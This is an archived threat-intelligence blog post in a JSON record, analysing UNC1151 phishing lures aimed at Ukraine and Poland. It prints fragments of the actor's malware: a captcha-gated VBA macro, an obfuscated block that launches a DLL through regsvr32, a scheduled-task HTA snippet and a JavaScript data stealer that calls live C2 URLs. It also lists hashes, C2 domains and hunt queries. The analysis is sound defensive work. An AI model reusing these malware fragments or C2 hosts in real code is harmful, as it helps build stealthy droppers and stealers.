{
	"id": "a5fb7306-b730-4b28-9549-ffc2cd9e6e7a",
	"created_at": "2026-05-06T02:03:09.579555Z",
	"updated_at": "2026-05-06T02:03:52.679669Z",
	"deleted_at": null,
	"sha1_hash": "f701bdae3ae5d3caf47f349d5529b3e6ee098f09",
	"title": "StrikeReady — AI-Powered Security Command Center",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1389646,
	"plain_text": "StrikeReady — AI-Powered Security Command Center\r\nArchived: 2026-05-06 02:01:10 UTC\r\nUNC1151 has operated with a higher operational tempo in 2025, and in this blog, Labs shows how to track this actor by surfacing two clusters of activity and tying them to previously attributed samples.\r\nFiles that leverage anti-analysis techniques can often be interesting threads to pull on. In this case, we noticed a true positive document detection that wasn’t executing properly in our analysis environment, and it quickly became clear why. For background on UNC1151, you should read the high quality articles on this actor from CERT-PL, SentinelOne, Harfang Lab, GTIG/Mandiant, and Proofpoint.\r\nThe document (Лист мадопомога.doc ec0e4a3dcfcc85ed52783f7cf2e80ddf) was leveraging a dynamic captcha, created in a local macro, to prevent analysis.\r\nFigure 1: What the user sees upon opening the doc\r\nThe reason we know it was there to prevent detection is that the first goal of a phish is to get code execution by opening the document. The attacker had already achieved macro execution, so any roadblocks thrown up after that point could only serve to hinder detection.\r\nThe macro in the document is shown in the self-documented code block below. Noteworthy is that when the captcha is correct, the string uOMeDrJtHN is passed to unprotect the document, and the function llolo10ooll is executed, which we will pivot on later. This has the hallmarks of being generated by an LLM. 
The rest of the obfuscation leverages 1, L, 0 and o, which seems to be a nod to lol.\r\nhttps://strikeready.com/blog/captch-ya-if-you-can/\r\nPage 1 of 8\r\nPrivate Sub CommandButton1_Click()\r\n    ' Validate the user input CAPTCHA\r\n    userInput = Me.TextBox1.Value\r\n    correctCaptcha = Me.Label2.Caption\r\n\r\n    If userInput = correctCaptcha Then\r\n        MsgBox \"CAPTCHA verified successfully!\", vbInformation\r\n        ActiveDocument.Unprotect (\"uOMeDrJtHN\")\r\n        For i = ActiveDocument.Shapes.Count To 1 Step -1\r\n            ActiveDocument.Shapes(i).Delete\r\n        Next i\r\n        llolo10ooll\r\n    Else\r\n        MsgBox \"Incorrect CAPTCHA. Please try again.\", vbExclamation\r\n        ' Optionally, regenerate a new CAPTCHA\r\n        Label2.Caption = GenerateRandomCaptcha()\r\n    End If\r\nEnd Sub\r\n\r\nPrivate Function GenerateRandomCaptcha() As String\r\n    ' Characters to choose from for captcha\r\n    characters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"\r\n    Randomize ' Initialize random number generator\r\n    ' Generate a 6-character random CAPTCHA\r\n    For i = 1 To 6\r\n        captcha = captcha \u0026 Mid(characters, Int((Len(characters) * Rnd) + 1), 1)\r\n    Next i\r\n    GenerateRandomCaptcha = captcha\r\nEnd Function\r\nFigure 2: VB code to dynamically create a CAPTCHA\r\nThe document is then unprotected, the decoy below is shown, and the macro carves out a DLL and executes it.\r\nFigure 3: decoy shown post macro execution\r\nThe full script is available in the appendix, but the MZ header encoding starts 37 37 20 39 30 → 77 90 → MZ.\r\nFigure 4: MZ header encoding\r\nThe carved file, EdgeService.dll 59b4add2262c4f44a3dc955893fe583d, beacons to agelessinvesting.xyz.\r\nPivoting on the aforementioned doc password, we can see the following matches:\r\nFile | Uploader | Hash (MD5) | C2\r\nРЕЗЮМЕ_Костенко.doc | Ukraine | 1990c4504010cd123c5d99ffee5551aa | emfempowerment.top\r\nunknown | Ukraine | 7505ce7cba927140b91fd51986c4e717 | 
hometownplate.top\r\nFigure 5: other recent payloads from this actor\r\nFigure 6: similar decoy from a different doc\r\nLeft as an exercise for the reader, one can also find many similarities to previously attributed samples, such as the macro that launches the DLL, using 433A5C57696E646F77735C53797374656D33325C72656773767233322E657865 (regsvr32) or 2F75202F7320 (the arguments). An example match from Harfang Lab’s post would be Список на перевірку 2025-2026.xls e21f310442347eeed2210a75c1fa8e01\r\no01lolololl1.TargetPath = o0101l0ll1o(\"433A5C57696E646F77735C53797374656D33325C72656773767233322E657865\")\r\no01lolololl1.Arguments = o0101l0ll1o(\"2F75202F7320\") \u0026 Chr(34) \u0026 oo10l0lol \u0026 o0101l0ll1o(\"5C45646765536572766963652E646C6C\") \u0026 Chr(34)\r\no01lolololl1.Description = \"\"\r\no01lolololl1.WindowStyle = o0101l0ll1o(\"30\")\r\no01lolololl1.WorkingDirectory = loll11ol0o\r\no01lolololl1.Save\r\nSet o01lolololl1 = Nothing\r\nFigure 7: sig-able execution block, even obfuscated\r\nNoticing that aspects of the above were being detected by ESET as FrostyNeighbor, we went hunting on their other detections to try to find other samples. This led us to a set of HTAs such as 929. w sprawie zaniechania poboru podatku dochodowego od osób fizycznych.hta 9f5f8910fe8a554640124805ccfceadc. 
After execution, we can see the decoy content:\r\nFigure 8: decoy from .hta malware above\r\nExamining the decoded first stage payload, an embedded HTA, we can see the execution arguments being built in the same way, with String.fromCharCode(34) standing in for the earlier Chr(34).\r\na0_0x1ddaff.Description = \"Create automated workflows between QQ applications and services to synchronize files, get notifications, collect data, and more\";\r\nvar taskName = \"QQ Automated Workflows\";\r\nvar programPath = a0_0x42397a;\r\nvar a0_0x16e3db = \"//B //E:jscript \" + String.fromCharCode(34) + programPath + \":Zone.Identifier\" + String.fromCharCode(34) + \" /QQEX\";\r\na0_0x2838df.Arguments = a0_0x16e3db;\r\na0_0x225f2e.Settings.MultipleInstances = 1;\r\nFigure 9: similar execution obfuscation\r\nAfter rounds of decoding, available in the appendix, we can see a data stealer:\r\nvar a0_0x76f3fa = \"https://recommendations.99boulders.icu/how-to-tie-climbing-knots-stretches-bouldering.html\";\r\nvar a0_0x5efd49 = \"https://recommendations.99boulders.icu/builds/core/8f656da/gdpr/vendor/prebid/es2018/prebid.min.js\";\r\nvar a0_0x1fb64f = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36\";\r\na0_0x14aa73.push(\"User: \" + userName);\r\na0_0x14aa73.push(\"\\nComputer: \" + computerName);\r\na0_0x14aa73.push(\"\\nSystem: \" + osVersion);\r\na0_0x14aa73.push(\"\\nBooted: \" + a0_0x18bb96);\r\na0_0x14aa73.push(\"\\nTime: \" + new Date());\r\nFigure 10: readable data stealer ftw\r\nLooking for commonalities in the code, we can find a substantially similar payload used in a ClickFix attack targeting Poland, described by researcher Ireneusz Tarnowski. 
For further analysis of that payload chain, please see the link.\r\nCircling back to our original HTA payload, we can see that it was loaded by a malicious PDF file W202504281099-01.pdf\r\nFigure 11: PDF doc targeting Poland\r\nBy looking for PDF files that have similar execution paths, we can find Potwierdzenie_215082025.pdf d10669832288eeb84b7cb2043f9d53d6 dropping a similar-looking 926. zmieniające rozporządzenie w sprawie szczegółowych warunków i szczegółowego trybu przyznawania i wypłaty pomocy finansowej w ramach schematów na rzecz dobrostanu zwierząt w ramach.hta 9f70fdf21212846b23a4a2fa188fc6db beaconing to the C2 listed in the table below, as well as 2de562e10411ccd868feb556f8c8f53b GMP_GMP093571.pdf beaconing to fermen.pickleandferment.top\r\nFigure 12: PDF doc targeting Ukraine\r\nTop level file | Hash (MD5) | C2 / Domain\r\nW202504281099-01.pdf | 8ad246c273defa19cdea4f6fb178aa5f | recommendations.99boulders.icu\r\nGMP_GMP093571.pdf | 2de562e10411ccd868feb556f8c8f53b | fermen.pickleandferment.top\r\nPotwierdzenie_215082025.pdf | d10669832288eeb84b7cb2043f9d53d6 | konsolahetman-epuap.abstractedreality.online\r\nZalacznik.rar | af5bd3584dba96a1bf765ed9aefe7f1d | —\r\nZalacznik.tar.gz | 6d5513b888fbf86077f73560448d2d14 | —\r\nFigure 13: recent PDF files from this attacker\r\nVT Queries | Notes\r\nengines:frostyneighbor | Detects this cluster, primarily from ESET\r\ncontent:\"/P -2112 /Perms\" | Detects a specific permission structure\r\ncontent:\"uOMeDrJtHN\" | Detects the key used to unlock docs\r\nFigure 14: VT hunt queries\r\nAll files mentioned are available for download on our github.\r\nPlease get in touch at research@strikeready.com if you have questions, corrections, or comments, or if you appreciate Richard Wolf’s attribution.\r\nSource: https://strikeready.com/blog/captch-ya-if-you-can/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://strikeready.com/blog/captch-ya-if-you-can/"
	],
	"report_names": [
		"captch-ya-if-you-can"
	],
	"threat_actors": [],
	"ts_created_at": 1778032989,
	"ts_updated_at": 1778033032,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f701bdae3ae5d3caf47f349d5529b3e6ee098f09.pdf",
		"text": "https://archive.orkl.eu/f701bdae3ae5d3caf47f349d5529b3e6ee098f09.txt",
		"img": "https://archive.orkl.eu/f701bdae3ae5d3caf47f349d5529b3e6ee098f09.jpg"
	}
}